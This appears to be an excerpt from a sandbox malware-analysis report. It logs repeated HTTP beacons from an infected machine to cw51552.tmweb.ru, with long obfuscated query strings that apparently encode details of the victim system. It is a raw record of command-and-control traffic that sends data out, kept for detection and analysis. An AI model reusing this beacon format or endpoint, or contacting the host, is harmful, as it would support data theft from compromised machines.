Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
